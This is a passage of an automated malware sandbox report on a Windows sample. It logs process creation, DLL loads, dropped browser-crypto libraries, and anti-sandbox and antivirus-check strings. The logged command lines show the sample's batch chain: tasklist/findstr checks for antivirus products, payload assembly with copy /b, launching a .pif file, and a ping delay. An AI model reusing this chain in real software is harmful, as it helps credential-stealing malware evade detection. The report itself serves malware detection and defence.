                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "NickelTruckWritersBattery" Mattress
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif 1151\Spice.pif 1151\a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "NickelTruckWritersBattery" Mattress Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\aJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif 1151\Spice.pif 1151\aJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: mozglue.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: 0dN59ZIkEM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                Source: Binary string: mozglue.pdbP source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                Source: Binary string: nss3.pdb@ source: nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
                Source: Binary string: nss3.pdb source: nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr
                Source: Binary string: mozglue.pdb source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
                Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifUnpacked PE file: 11.2.Spice.pif.10000000.2.unpack
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EEC6D9 LoadLibraryA,GetProcAddress,11_2_00EEC6D9
                Source: sqln[1].dll.11.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                Source: freebl3[1].dll.11.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.11.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                Source: msvcp140[1].dll.11.drStatic PE information: section name: .didat
                Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.11.drStatic PE information: section name: .00cfg
                Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                Source: softokn3[1].dll.11.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E98B75 push ecx; ret 11_2_00E98B88

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\nss3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile created: C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EF59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00EF59B3
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E85EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00E85EDA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00E933B7
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR
                Source: Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                Source: Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CONTENT.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIP
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_11-100363
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifAPI coverage: 4.3 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
